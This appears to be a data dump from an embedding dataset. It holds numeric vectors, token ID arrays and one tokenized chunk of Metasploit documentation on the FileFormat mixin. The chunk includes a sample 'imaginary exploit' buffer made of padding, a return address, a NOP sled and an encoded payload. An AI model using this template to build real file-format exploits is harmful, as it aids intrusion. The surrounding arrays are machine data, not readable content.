-0.6597264409065247, 0.656091034412384, 0.21092377603054047, 0.3239191174507141, -0.1589101403951645, -0.1608271598815918, -0.39391419291496277, 0.5811720490455627, 0.18121425807476044, 0.411898136138916, 0.3545316159725189, 0.08380050212144852, 0.8987404108047485, -0.303335040807724, 0.27665823698043823, 0.7531883716583252, -1.2163052558898926, 0.21104645729064941, -0.1580110788345337, 0.2606755793094635, 0.9282782077789307, 0.4296821355819702, 0.8167449831962585, 0.5026471614837646, -0.448245644569397, 0.635966420173645, -0.6000394225120544, -0.18372708559036255, -0.9697443246841431, 0.85309237241745, -0.18734796345233917, -0.2701839208602905, 0.9014879465103149, 0.8577590584754944, -0.10355395823717117, 0.2158769965171814, -0.9120190143585205, 1.0518267154693604, -0.3396058678627014, -0.06307276338338852, -0.2800682783126831, 0.5521329641342163, 0.3898006081581116, -0.12355764955282211, -0.0029586986638605595, 0.7454766631126404, -0.20765921473503113, 0.3457150161266327, -0.18658322095870972, 0.31640365719795227, -0.46474725008010864, -0.4621208608150482, 0.10873446613550186, -0.8764429688453674, -0.3430657684803009, 0.6363146305084229, -0.3694353699684143, 0.39823591709136963, 0.34636685252189636, -1.0103950500488281, 0.34055542945861816, -0.06807759404182434, 0.536583423614502, 0.23236697912216187, 0.1549917310476303, -0.228135883808136, -0.9858353734016418, 0.2717573344707489, 0.00423248577862978, -1.0690263509750366, -0.17662502825260162, 0.30264005064964294, 0.5472339391708374, 0.27826419472694397, 0.987174391746521, 0.5561694502830505, -0.6372597813606262, 0.07056596130132675, 0.41167721152305603, -0.29469773173332214, -0.4780358374118805, 0.015157734975218773, 0.6981317400932312, -1.0425540208816528, -0.8944772481918335, -1.1331270933151245, 0.007884767837822437, 0.6652007699012756, 0.9103242754936218, -0.1344253420829773, 0.8662234544754028, -0.3252044916152954 ]
[ 2108, 8983, 2098, 2030, 4728, 10210, 28731, 2094, 1012, 4945, 1024, 1024, 18093, 7011, 18450, 2050, 2709, 3642, 2013, 18093, 7781, 7127, 1996, 18093, 2106, 2025, 15389, 2030, 12527, 14153, 1012, 4945, 1024, 1024, 2051, 5833, 10288, 21649, 10760, 4539, 2106, 2025, 6869, 2000, 1996, 4434, 5227, 1999, 1037, 23259, 5450, 1012, 4638, 1054, 15006, 3215, 1998, 1054, 6442, 1010, 2059, 5136, 4852, 1059, 10343, 9247, 4710, 1012, 4945, 1024, 1024, 9223, 2890, 22086, 10760, 4539, 5838, 1999, 2019, 4498, 9223, 2126, 1010, 1998, 2089, 2025, 2022, 2770, 1996, 8211, 2326, 2012, 2035, 1012, 4945, 1024, 1024, 4242, 2319, 4498, 9223, 6453, 4158, 1010, 1998, 1996, 4539, 2089, 2025, 2022, 2770, 1996, 3517, 2578, 2012, 2035, 1012, 4945, 1024, 1024, 4895, 16416, 7507, 3468, 10760, 3677, 2030, 2326, 2003, 2025, 3362, 3085, 1010, 2411, 5393, 2011, 1037, 4188, 4434, 2030, 24582, 8737, 1523, 4895, 16416, 7507, 3468, 1524, 4471, 1012, 102 ]
metasploit
134.txt
1
[CLS] msf : : exploit : : fileformat is the mixin to use to create a file format exploit. there actually isn ’ t much in the mixin, but the most important method is this : file _ create : usage for file _ createas the name implies, the file _ create method allows you to create a file. you should be using this method because it does more than just writing data to disk. one of the important things it does is it will report the file creation to the database in the format of # { ltype }. localpath, and the file will always be written to metasploit ’ s local directory defined in msf : : config. local _ directory ( by default this path is ~ /. msf4 / local ), which keep files nice and organized. to use the mixin, first include msf : : exploit : : fileformat under the scope of your metasploit3 class : include msf : : exploit : : fileformat and here ’ s an example of using file _ create to build an imaginary exploit : # this is my imaginary exploit buf = " " buf < < " a " * 1024 buf < < [ 0x40201f01 ]. pack ( " v " ) buf < < " \ x90 " * 10 buf < < payload. encoded file _ create ( buf ) custom filenamethe msf : : exploit : : filename mixin by default has a registered filename datastore option, and it is actually optional. if there ’ s no filename provided, the mixin will set the name in this format : " exploit. fileformat. # { self. shortname } ", where self. shortname means the shorter version of the module name. if you wish to set a default one ( but still changeable by the user ), then you simply register it again in the module, like this : register _ options ( [ optstring. new ('filename ', [ true,'the malicious file name ','msf. jpg'] ) ], self. class ) fixed filenameoccasionally, you might not want your user to change the filename at all. a lazy trick to do that is by modifying the filename datastore option at runtime, but this is very much not recommended. in fact, if you do this, you will not pass msftid
[ -0.13602006435394287, 0.008091446943581104, -0.22374527156352997, 0.5916870832443237, -0.338321715593338, -0.037537701427936554, -0.36930495500564575, -0.06178915128111839, 0.7210497856140137, 1.4374266862869263, 0.1671852022409439, -0.03895581141114235, 0.49593639373779297, -0.5443025827407837, -0.2151641547679901, -0.27608004212379456, -0.28934311866760254, -0.44628772139549255, -0.4433688223361969, 0.09825073927640915, 0.08587268739938736, -0.498943954706192, -0.06813609600067139, -0.8901904225349426, -0.46935608983039856, 0.012350472621619701, -0.0666227638721466, -0.25553908944129944, 0.11214623600244522, 0.5090616345405579, 0.5095418095588684, -0.24611446261405945, -0.1610875427722931, -0.3926221430301666, -0.12941481173038483, -0.07491372525691986, 0.9773564338684082, -0.2042248249053955, 0.054027434438467026, -0.7649692296981812, 0.22249431908130646, -0.8398172855377197, 0.18598252534866333, -0.17501302063465118, -0.8397063612937927, -0.2897788882255554, 0.268176406621933, 0.5126429796218872, 0.5905082821846008, -0.08088402450084686, 0.29276958107948303, 0.4043672978878021, 0.13021670281887054, -0.22339805960655212, -0.3032512962818146, -0.541433572769165, 0.19431865215301514, 0.07545049488544464, -0.12259026616811752, 0.023325780406594276, -0.43722036480903625, 0.819389283657074, 0.24850735068321228, -0.3859078884124756, 0.3467960059642792, 0.3980132043361664, -0.6343505382537842, -0.21216163039207458, -0.04993857070803642, -0.2702793776988983, 0.10558003187179565, 0.8008703589439392, -0.1447116881608963, 0.2619169354438782, -0.46947523951530457, -0.2517898678779602, -0.22478030622005463, -0.6872125864028931, -0.5747187733650208, 0.686625599861145, -0.46047547459602356, 0.7171437740325928, 0.2828071713447571, -0.463390052318573, 0.04781568795442581, -0.07267498970031738, 0.6344655156135559, 0.6635192632675171, 0.41781869530677795, 0.4864741563796997, 0.44059813022613525, 0.2968398332595825, -0.5180725455284119, -0.49484142661094666, 0.6617308855056763, 0.6864892840385437, -0.6329348087310791, 0.5102218985557556, -0.2659260034561157, 0.010927249677479267, 0.8934043645858765, 1.2245343923568726, 0.04718121513724327, 0.04156629741191864, -0.0585719496011734, 0.5123298764228821, 0.2945193946361542, -0.01882471702992916, -0.3654702603816986, -0.11816944926977158, 0.51687091588974, -0.21521233022212982, 0.15032002329826355, -0.936668872833252, 0.040290653705596924, 0.406103253364563, 0.412651002407074, 0.8535500764846802, -0.5337231755256653, 0.37313011288642883, 0.00846768543124199, -0.5290932059288025, 0.0178732480853796, -0.8679168224334717, -0.48065119981765747, -0.494376540184021, 0.18007412552833557, 0.3131454885005951, -0.3620774745941162, -0.4618741273880005, -0.12019916623830795, -0.4116258919239044, -0.21005035936832428, 1.0595725774765015, -0.2565869390964508, 0.6085436344146729, -0.3361426293849945, 0.5259568095207214, 0.8436600565910339, -1.2654609680175781, 0.07144013047218323, 0.3974820673465729, 0.2862871587276459, 1.2317471504211426, 0.2551170885562897, -0.19753867387771606, -0.3054363429546356, -0.03313464671373367, 0.1017700731754303, 0.48386427760124207, -0.1792442947626114, -0.33669784665107727, 0.7965192198753357, 0.04884801432490349, -0.4419762194156647, -0.06535938382148743, -1.215490460395813, 0.2652401030063629, 0.11537806689739227, -0.17848287522792816, 0.16658276319503784, 1.1344691514968872, 0.02009464241564274, 0.23631145060062408, -0.4524692893028259, 0.11290004104375839, -0.6215476989746094, -0.44887498021125793, -0.08993984013795853, -0.07451242208480835, 0.21659180521965027, -0.0882551446557045, 0.050388649106025696, -0.10811129212379456, 0.8613606691360474, 0.5664916038513184, 0.1300552785396576, -0.43913623690605164, 0.16031387448310852, 0.2459045946598053, -0.7027882933616638, 0.4929494261741638, -0.08291543275117874, 0.7883920073509216, -0.25549301505088806, 0.25454723834991455, 0.16497133672237396, -0.06564946472644806, -0.29938608407974243, -0.3688470125198364, 0.2628016769886017, 0.8929670453071594, -1.1944835186004639, 0.08319582045078278, 0.648021936416626, -0.5535309314727783, -1.2666534185409546, -0.11540749669075012, 0.06304974108934402, -1.4226514101028442, -0.6764136552810669, 0.009735694155097008, -0.11427003145217896, 0.7662805318832397, -0.4333570897579193, -0.09261039644479752, 0.7424404621124268, 0.47092556953430176, 0.05083022266626358, 0.5245397090911865, 1.1244118213653564, -0.044050443917512894, -0.480823278427124, -0.0981513038277626, 0.19855067133903503, 0.20179714262485504, -0.26631614565849304, 0.2802457809448242, -0.1401219516992569, -0.023030173033475876, -0.15880194306373596, 0.24035786092281342, 0.8662835955619812, 0.30272364616394043, -0.09675709903240204, -0.15104006230831146, 0.3682715594768524, 0.7345675826072693, -0.1818617731332779, -0.06638363003730774, -0.14350347220897675, 0.5420044660568237, 0.8435598611831665, 0.5806454420089722, 0.2593146562576294, -0.21981193125247955, 0.1847013533115387, 0.21220189332962036, -0.4100448489189148, 0.48603010177612305, 0.030536236241459846, 1.4132779836654663, -0.21354538202285767, 1.4446500539779663, 0.3946443498134613, 0.6375322341918945, 0.20033539831638336, 0.07395826280117035, 0.41024649143218994, 0.4986526072025299, -0.9934179186820984, 1.0807979106903076, -0.0017968075117096305, -0.34933045506477356, -0.8006371259689331, -0.43176332116127014, 0.2793618142604828, 1.318269968032837, -0.8764902353286743, -0.9408792853355408, 0.448649525642395, -0.40395891666412354, -0.4615151584148407, -0.37497255206108093, -0.06132109463214874, 0.4330836832523346, -0.21791820228099823, 0.32744458317756653, -0.5371025204658508, -0.643928050994873, -0.23566676676273346, -0.2035105675458908, -1.5969475507736206, -0.5075591206550598, -0.5941464900970459, 0.3056396543979645, 0.14739345014095306, -0.7376015782356262, 0.12010738998651505, -0.5493590831756592, -0.17445838451385498, 0.1471133977174759, -0.10956067591905594, 0.33415427803993225, 0.03373964875936508, 0.014643299393355846, -0.3412707448005676, 0.4996297359466553, -0.31873565912246704, 0.8769448399543762, -0.9230005741119385, -0.14421741664409637, 0.10166896134614944, -0.10746073722839355, 0.05631965771317482, 0.19609421491622925, 0.8023644089698792, -0.11341066658496857, 0.4329204261302948, 0.12423855066299438, -0.24022413790225983, 0.16954217851161957, -0.3421422839164734, -0.129700168967247, -0.2692180275917053, -0.20646652579307556, -0.5572904348373413, -0.3965817391872406, 0.3146404027938843, 0.6812382936477661, -0.36543479561805725, 0.46594229340553284, 0.22256729006767273, 0.29177433252334595, -0.6228477954864502, 0.49976301193237305, 0.14691613614559174, 0.002147829392924905, -0.33203834295272827, 0.06262484937906265, 0.31947061419487, -0.2872413694858551, -0.16830500960350037, 0.2238302230834961, -0.49328523874282837, 0.5415531396865845, 0.3582565486431122, -1.0900838375091553, -0.08536142855882645, 0.10773912072181702, -0.01646173745393753, -0.18257363140583038, -0.15600568056106567, 0.2799529433250427, 0.09728199243545532, -0.022253407165408134, -0.41296446323394775, -0.3622395694255829, 0.090635746717453, -0.20071285963058472, -0.4252105951309204, -0.6407241821289062, 1.1942213773727417, 0.12032979726791382, 0.24956493079662323, 0.6939625144004822, 0.6120513677597046, -0.89421546459198, 0.03993016108870506, -0.40769723057746887, 0.25802311301231384, 0.40881580114364624, 0.2935192584991455, -0.19503720104694366, 0.1650611013174057, 1.0948251485824585, -0.1401229202747345, -0.22649270296096802, 0.00894051231443882, -0.021131256595253944, 0.6769391894340515, 0.43479037284851074, 0.2147691696882248, -0.3672451674938202, -0.5516301393508911, -0.24633648991584778, 0.19978287816047668, 0.03829783573746681, 0.7690294981002808, 0.04102287441492081, 0.06953957676887512, -0.5526835322380066, -0.11351428925991058, 0.7982938289642334, -0.4383935332298279, -0.18557867407798767, 0.8000057935714722, -0.20270992815494537, 0.7403878569602966, -0.6162787675857544, 0.32256025075912476, -0.2965930998325348, 0.5563552379608154, 0.31593430042266846, 0.14658217132091522, -0.09686549007892609, -0.40197598934173584, -0.44808122515678406, -0.3469046950340271, -0.15178561210632324, -0.17377614974975586, -0.028402214869856834, 0.2978742718696594, -0.5528998374938965, -0.7732841372489929, -1.0040656328201294, 0.8656259775161743, 1.2691946029663086, 0.7907190322875977, 0.7933396100997925, 1.0699857473373413, -0.038827698677778244, -0.2347264587879181, 0.5514791011810303, -0.3138781785964966, 0.35938912630081177, -0.5437307357788086, 0.508444607257843, 0.4506320655345917, 0.40897059440612793, 0.1549568921327591, -0.06847090274095535, -0.4598172605037689, -0.07700378447771072, -0.11555484682321548, -0.08205237984657288, -0.7243022918701172, -0.14685043692588806, 0.3565289080142975, 0.04526721313595772, -1.0071134567260742, 0.1447000801563263, -0.4278523623943329, 0.08349135518074036, 0.12361173331737518, -0.8813791275024414, 0.23815545439720154, -0.227674201130867, 0.30052274465560913, 0.5904990434646606, 0.06400551646947861, -0.4359917938709259, -0.6530766487121582, 0.060013964772224426, -0.7328320145606995, 0.3514084815979004, 0.21114395558834076, 0.3113013505935669, -0.044808704406023026, -0.9197510480880737, -0.2582443058490753, 0.0818089172244072, -0.5402295589447021, -0.2648175358772278, -0.20025105774402618, 0.6366035342216492, 0.2068314254283905, 0.3667922914028168, -0.20581641793251038, -0.23253148794174194, 0.47334617376327515, -0.1747809797525406, 0.275855153799057, -0.6163016557693481, 0.5157380104064941, 0.7967992424964905, 0.007550826296210289, 0.20100542902946472, -0.26606741547584534, -0.7253159880638123, -0.4592714011669159, -0.7964379787445068, -0.22878949344158173, -0.8335712552070618, -0.08030436933040619, 0.7448123097419739, -0.3945436179637909, -0.7587430477142334, 0.14511853456497192, 0.02635430358350277, 0.06991288810968399, -0.15892620384693146, 0.005153139587491751, -0.4218849539756775, 0.24195529520511627, -0.41737988591194153, 0.016307301819324493, -0.18135008215904236, 0.3041902780532837, -0.7778813242912292, -0.9484996199607849, 1.3583135604858398, 0.5469902157783508, -0.014806505292654037, -0.6722025871276855, -0.33825773000717163, 0.4479854702949524, 0.1941814422607422, -0.16260339319705963, 0.2932654917240143, -0.031689681112766266, 0.16912761330604553, -0.3477252423763275, -0.2153531312942505, -1.1123020648956299, -0.47796347737312317, -0.30229273438453674, -0.31226783990859985, 0.178598091006279, 0.026358362287282944, 0.197031170129776, -0.7825192809104919, -0.5050475597381592, 0.3167746961116791, -0.09516430646181107, 0.6543529033660889, -0.2555004060268402, -0.08778966963291168, -0.44036799669265747, 0.24021218717098236, -0.5177112221717834, 0.3285488784313202, -0.7493144273757935, 0.22440578043460846, -0.0009209740674123168, 0.42335838079452515, 0.34893935918807983, -0.6967148780822754, -0.9149183630943298, 0.25530996918678284, 0.019289376214146614, -0.3168050944805145, 0.01884027197957039, 0.8492276668548584, -0.5741060376167297, 0.5804786682128906, -0.07054895162582397, -0.7285513877868652, -1.1149370670318604, -0.3487885892391205, 0.1952255815267563, -0.27188828587532043, 0.1580478698015213, -0.8285086750984192, -0.7422691583633423, -0.6949506998062134, 0.3731147348880768, 0.49458277225494385, -1.5655442476272583, -0.055899184197187424, 0.09940800070762634, -0.18284504115581512, -0.41971686482429504, 0.08428451418876648, -0.6245929002761841, -0.4551489055156708, 0.38704872131347656, 0.6696802377700806, -0.013334155082702637, -0.17371153831481934, -0.05721299350261688, -0.032313037663698196, 0.4189187288284302, 0.26208823919296265, -1.0260753631591797, 0.0012440915452316403, 0.20538192987442017, 0.12533539533615112, -0.42735588550567627, 0.025902660563588142, -0.5782878398895264, 0.6051254272460938, -0.2618652284145355, 0.14201125502586365, 0.06654171645641327, 0.29294341802597046, -0.5091472864151001, 0.5362958908081055, 0.11236587911844254, -0.898688018321991, 0.5216890573501587, -0.6645282506942749, 0.5625998973846436, 0.1952907145023346, -0.14811575412750244, -0.2179880291223526, 0.3320206105709076, -0.6355770230293274, -0.503746747970581, 0.8751896619796753, 0.08818377554416656, -0.21917448937892914, 0.13140377402305603, -0.481209933757782, 0.5221148133277893, -0.3475184142589569, -0.21728357672691345, 1.3507459163665771, 0.6073721051216125, -0.0243248101323843, -0.18963785469532013, 0.29802098870277405, 0.4219195544719696, -0.5165241956710815, 0.5062119960784912, 0.3011108636856079, -0.2939397990703583, -0.5042414665222168, 0.04134351387619972, -0.3058732748031616, -0.5816290378570557, 0.003324847435578704, 0.43240100145339966, -0.6045488119125366, 0.7333188652992249, -0.2738415598869324, -0.7210348844528198, 0.07169172912836075, 0.18137112259864807, -0.35668429732322693, -0.0933132991194725, 0.3488852381706238, 0.6719182729721069, 1.088341474533081, -0.3837318420410156, -0.5515206456184387, -0.12472716718912125, 0.08529023081064224, 0.535449743270874, -0.41108575463294983, -0.1396685391664505, 0.4040112793445587, 0.3562242090702057, -1.2602628469467163, -0.349926620721817, -0.5635697841644287, -0.01176541205495596, 0.11803310364484787, -0.4986672103404999, 0.07062315195798874, 0.1804381012916565, -0.16594941914081573, 0.33197319507598877, 0.7446039915084839, 0.23963874578475952, 0.421967089176178, -0.8482055068016052, 0.29844310879707336, 0.4524741470813751, 0.3084537088871002, 0.5951948761940002, -0.5630866885185242, -0.17932917177677155, -0.3447624146938324, 0.3994084894657135, 0.17675988376140594, 0.39186957478523254, 0.41227787733078003, 0.2966391146183014, 0.3679613769054413, 0.5251702070236206, 0.17894281446933746, 0.5404202342033386, -0.23200377821922302, 0.167035773396492, 0.5463572144508362, -0.32481372356414795, -0.7086248397827148, -0.32997745275497437, -0.16992472112178802, -0.49636194109916687, 0.5002990365028381, -0.41252803802490234, 0.20497474074363708, -0.5893262028694153, -0.1645844280719757, 0.19991496205329895, -1.5358999967575073, 0.24618245661258698, -0.7981566190719604, 0.17979156970977783, -0.0944431945681572, -0.04348447173833847, 0.1045767068862915, 0.4689033329486847, -0.20589789748191833, -0.48886731266975403, -0.7835806608200073, 0.0810384675860405, -0.03596988320350647, -0.4913773536682129, -0.6964179277420044, 0.08636734634637833, -0.6737427115440369, -0.9464521408081055, -0.23096179962158203, -0.43891021609306335, -0.04936396703124046, -0.7306799292564392, 0.0070069110952317715, -0.19050967693328857, -0.6644006371498108, 0.536185622215271, -0.33157283067703247, 0.08513814955949783, 0.028491782024502754, -0.9977073073387146, 0.2860180139541626, 0.20188763737678528, -0.3344654440879822, 0.46116897463798523, 0.4940307140350342, -0.08055181801319122, 0.4546872675418854, -0.5990772843360901, 0.3865833282470703, -0.07102230936288834, 0.2590397000312805, 0.12174154818058014, -0.04221363738179207, -0.7699944376945496, 0.4567173421382904, -0.33057379722595215, -0.6506602764129639, -0.2884710431098938, -1.211132287979126, 0.4108055531978607, 0.7428352236747742, 0.12686285376548767, -0.41535642743110657, 0.8576160669326782, 0.05784009397029877, 0.16352230310440063, -0.3429471552371979, 0.4680086672306061, 0.5028547644615173, 0.29812929034233093, -0.11611898243427277, 0.2791116535663605, -0.18294522166252136, 0.026572853326797485, -0.1874231994152069, 0.023433752357959747, -0.011973220854997635, 0.7876994609832764, 0.2531583607196808, -0.27854859828948975, -0.3891412913799286, -0.4548453688621521, -0.32257187366485596, 0.7772480845451355, -0.38304823637008667, 0.36724600195884705, -0.08464157581329346, 0.1359548419713974, -1.0649056434631348, -0.03924167528748512, -0.8130614757537842, -0.022409437224268913, 0.6908105611801147, -0.5606119632720947, -0.7050495743751526, -0.3530654013156891, 0.006249157711863518, 0.009074395522475243, 0.08352740854024887, -0.6421709656715393, 0.5965961217880249, 0.5027837753295898, -0.15760165452957153, 1.0136665105819702, -1.0804086923599243, -0.17769667506217957, -0.45251184701919556, -0.18563511967658997, -0.4692077040672302, -0.7274052500724792, 0.49687373638153076, 1.0579155683517456, 0.5610759854316711, -0.2904723286628723, -0.21967892348766327, 0.045141227543354034, 0.1605973094701767, 0.165043905377388, 0.04123692959547043, -0.22369809448719025, -0.6978530287742615, 0.28895506262779236, 0.1462109535932541, 0.5002039670944214, 0.046182967722415924, -0.01798800565302372, -0.048027437180280685, -0.054355379194021225, -0.06618546694517136, 0.6086717247962952, -0.4662751853466034, 0.22872835397720337, 0.8614702224731445, 0.7283933162689209, 0.7093517780303955, -0.20639745891094208, -0.18462924659252167, -0.10004330426454544, 0.4497816264629364, 0.29737505316734314, 0.500104546546936, 0.29337969422340393, -0.01758653298020363, 0.48422321677207947, -0.15418758988380432, -0.051494985818862915, 0.7266520857810974, 0.24282369017601013, -0.12663167715072632, 0.14888885617256165, 0.35930296778678894, 0.07565182447433472, -0.00873158872127533, 0.2042829841375351, 0.48466724157333374, -0.17908421158790588, 0.5705435276031494, -0.08740104734897614, 0.21239405870437622, 0.5905551910400391, -0.6067059636116028, 0.22786776721477509, -0.15763860940933228, -0.18029242753982544, 0.5369741916656494, -0.23431415855884552, -0.703670859336853, 0.6614630818367004, 0.9655364751815796, 0.5424138903617859, -0.7592161297798157, 0.28665095567703247, -0.1369161307811737, 0.19505053758621216, 0.49506044387817383, 0.005813113879412413, -0.6938808560371399, 0.1252046823501587, 0.19878610968589783, -0.08739200979471207, -1.2633470296859741, -0.4237016439437866, 0.24087239801883698, 0.5086790919303894, 0.4821796715259552, -0.41384315490722656, 0.09538131207227707, -0.7028270959854126, 0.501736044883728, -0.28177720308303833, 0.16325867176055908, 0.8409238457679749, 0.012323334813117981, -0.21969275176525116, 0.41947129368782043, -0.17795588076114655, -0.3015865981578827, -0.4625494182109833, 0.7829515337944031, 0.4264873266220093, 0.018339142203330994, -0.11009936779737473, -0.8453614115715027, -0.1673857867717743, 0.0330158993601799, -0.6316977143287659, -0.1619635373353958, -0.3350176513195038, -0.40378761291503906, 0.2283393293619156, -0.8513334393501282, -0.6389235854148865, -0.05860310420393944, 0.2778836190700531, -0.3058988153934479, -0.2132185697555542, 0.8038508296012878, 0.12400654703378677, -0.7016856074333191, -0.4422326683998108, 0.15687264502048492, 0.20209702849388123, 0.2122979462146759, 0.10238860547542572, -0.4542206823825836, -0.529142439365387, -0.5391796231269836, -0.7495142221450806, 0.6040694713592529, 0.029854923486709595, 0.16633856296539307, 0.16050298511981964, -0.6456670761108398, -0.632922887802124, -0.46537819504737854, -0.13001449406147003, -0.4693552255630493, 0.849841296672821, 0.5295684337615967, 0.39354491233825684, 0.35573169589042664, -0.5568539500236511, -0.2210823893547058, 0.06931348145008087, 1.0054281949996948, -0.14063967764377594, 0.839130163192749, 0.3881261944770813, -0.1262025684118271, -0.024800997227430344, 0.1220754086971283, -0.061846643686294556, -0.19234314560890198, -0.13777031004428864, -0.542527973651886, -0.06134656444191933, -1.047339916229248, -0.6134089231491089, -0.11005978286266327, -0.2378539741039276, 0.4606116712093353, -0.4759272038936615, -0.6591799259185791, 0.060357458889484406, -0.7192652225494385, -0.34739741683006287, -0.6190099120140076, 0.01271948590874672, 0.057083576917648315, -0.2895407974720001, 0.3415204882621765, -0.8909181952476501, 4.3796844482421875, 0.09981561452150345, 0.2903083562850952, 0.2235933095216751, 0.49797001481056213, 0.6610172390937805, 0.872178316116333, -0.35392051935195923, 0.30960801243782043, -0.33783382177352905, 0.22138939797878265, -0.02766384556889534, 0.4262411296367645, 0.7617756724357605, -0.14698843657970428, 0.3947209119796753, -0.7060022950172424, 0.13080014288425446, 0.15697824954986572, -1.0742547512054443, -1.2702842950820923, 0.257174015045166, -0.374642938375473, 1.1571990251541138, 0.5076934695243835, 0.6046909689903259, 0.7871770858764648, -0.564274787902832, 0.6123958230018616, -0.0173516683280468, 0.10914162546396255, -0.4352042078971863, 0.3402251601219177, -0.3888108730316162, 0.14263120293617249, 0.16385070979595184, -0.1107565313577652, -0.5863178968429565, -0.5019246339797974, -0.5661191940307617, 0.8685200810432434, 0.43214958906173706, -0.12069453299045563, -0.7285135388374329, 0.4114914536476135, 1.2484182119369507, -0.011250326409935951, 0.35795679688453674, 0.7583133578300476, -0.6662077307701111, 0.6405655145645142, -0.2778749465942383, 0.3363015651702881, 0.5584648847579956, -0.9888833165168762, 0.881619393825531, 0.4503066837787628, 0.12634187936782837, 0.47030875086784363, 0.47917070984840393, -0.0012930986704304814, -0.004726103972643614, 0.23899970948696136, 0.25382307171821594, -0.49313315749168396, -0.19091078639030457, -0.7194306254386902, -0.288629949092865, 0.19060955941677094, -0.4637846052646637, -0.48324868083000183, -0.37071067094802856, 0.20813511312007904, -0.8717682361602783, 0.5313652157783508, -0.18472614884376526, 0.09695114195346832, 0.46869534254074097, 0.0271880105137825, -0.4630056321620941, 0.18923155963420868, -1.0089523792266846, -0.3271195590496063, 0.732197105884552, 0.609070897102356, 0.19692139327526093, 0.030392620712518692, -0.5588971972465515, 0.13931894302368164, 0.028760544955730438, 0.24807779490947723, 0.4400832951068878, -0.04729251563549042, 0.6169747710227966, 0.1493561565876007 ]
[ 101, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 5371, 14192, 4017, 2003, 1996, 4666, 2378, 2000, 2224, 2000, 3443, 1037, 5371, 4289, 18077, 1012, 2045, 2941, 3475, 1521, 1056, 2172, 1999, 1996, 4666, 2378, 1010, 2021, 1996, 2087, 2590, 4118, 2003, 2023, 1024, 5371, 1035, 3443, 1024, 8192, 2005, 5371, 1035, 3443, 3022, 1996, 2171, 12748, 1010, 1996, 5371, 1035, 3443, 4118, 4473, 2017, 2000, 3443, 1037, 5371, 1012, 2017, 2323, 2022, 2478, 2023, 4118, 2138, 2009, 2515, 2062, 2084, 2074, 3015, 2951, 2000, 9785, 1012, 2028, 1997, 1996, 2590, 2477, 2009, 2515, 2003, 2009, 2097, 3189, 1996, 5371, 4325, 2000, 1996, 7809, 1999, 1996, 4289, 1997, 1001, 1063, 8318, 18863, 1065, 1012, 2334, 15069, 1010, 1998, 1996, 5371, 2097, 2467, 2022, 2517, 2000, 18804, 13102, 4135, 4183, 1521, 1055, 2334, 14176, 4225, 1999, 5796, 2546, 1024, 1024, 9530, 8873, 2290, 1012, 2334, 1035, 14176, 1006, 2011, 12398, 2023, 4130, 2003, 1066, 1013, 1012, 5796, 2546, 2549, 1013, 2334, 1007, 1010, 2029, 2562, 6764, 3835, 1998, 4114, 1012, 2000, 2224, 1996, 4666, 2378, 1010, 2034, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 5371, 14192, 4017, 2104, 1996, 9531, 1997, 2115, 18804, 13102, 4135, 4183, 2509, 2465, 1024, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 5371, 14192, 4017, 1998, 2182, 1521, 1055, 2019, 2742, 1997, 2478, 5371, 1035, 3443, 2000, 3857, 2019, 15344, 18077, 1024, 1001, 2023, 2003, 2026, 15344, 18077, 20934, 2546, 1027, 1000, 1000, 20934, 2546, 1026, 1026, 1000, 1037, 1000, 1008, 9402, 2549, 20934, 2546, 1026, 1026, 1031, 1014, 2595, 12740, 11387, 2487, 2546, 24096, 1033, 1012, 5308, 1006, 1000, 1058, 1000, 1007, 20934, 2546, 1026, 1026, 1000, 1032, 1060, 21057, 1000, 1008, 2184, 20934, 2546, 1026, 1026, 18093, 1012, 12359, 5371, 1035, 3443, 1006, 20934, 2546, 1007, 7661, 5371, 18442, 10760, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 5371, 18442, 4666, 2378, 2011, 12398, 2038, 1037, 5068, 5371, 18442, 2951, 23809, 2063, 5724, 1010, 1998, 2009, 2003, 2941, 11887, 1012, 2065, 2045, 1521, 1055, 2053, 5371, 18442, 3024, 1010, 1996, 4666, 2378, 2097, 2275, 1996, 2171, 1999, 2023, 4289, 1024, 1000, 18077, 1012, 5371, 14192, 4017, 1012, 1001, 1063, 2969, 1012, 2460, 18442, 1065, 1000, 1010, 2073, 2969, 1012, 2460, 18442, 2965, 1996, 7820, 2544, 1997, 1996, 11336, 2171, 1012, 2065, 2017, 4299, 2000, 2275, 1037, 12398, 2028, 1006, 2021, 2145, 2689, 3085, 2011, 1996, 5310, 1007, 1010, 2059, 2017, 3432, 4236, 2009, 2153, 1999, 1996, 11336, 1010, 2066, 2023, 1024, 4236, 1035, 7047, 1006, 1031, 23569, 3367, 4892, 1012, 2047, 1006, 1005, 5371, 18442, 1005, 1010, 1031, 2995, 1010, 1005, 1996, 24391, 5371, 2171, 1005, 1010, 1005, 5796, 2546, 1012, 16545, 2290, 1005, 1033, 1007, 1033, 1010, 2969, 1012, 2465, 1007, 4964, 5371, 18442, 10085, 15671, 19301, 2135, 1010, 2017, 2453, 2025, 2215, 2115, 5310, 2000, 2689, 1996, 5371, 18442, 2012, 2035, 1012, 1037, 13971, 7577, 2000, 2079, 2008, 2003, 2011, 29226, 1996, 5371, 18442, 2951, 23809, 2063, 5724, 2012, 2448, 7292, 1010, 2021, 2023, 2003, 2200, 2172, 2025, 6749, 1012, 1999, 2755, 1010, 2065, 2017, 2079, 2023, 1010, 2017, 2097, 2025, 3413, 5796, 6199, 3593 ]
metasploit
135.txt
0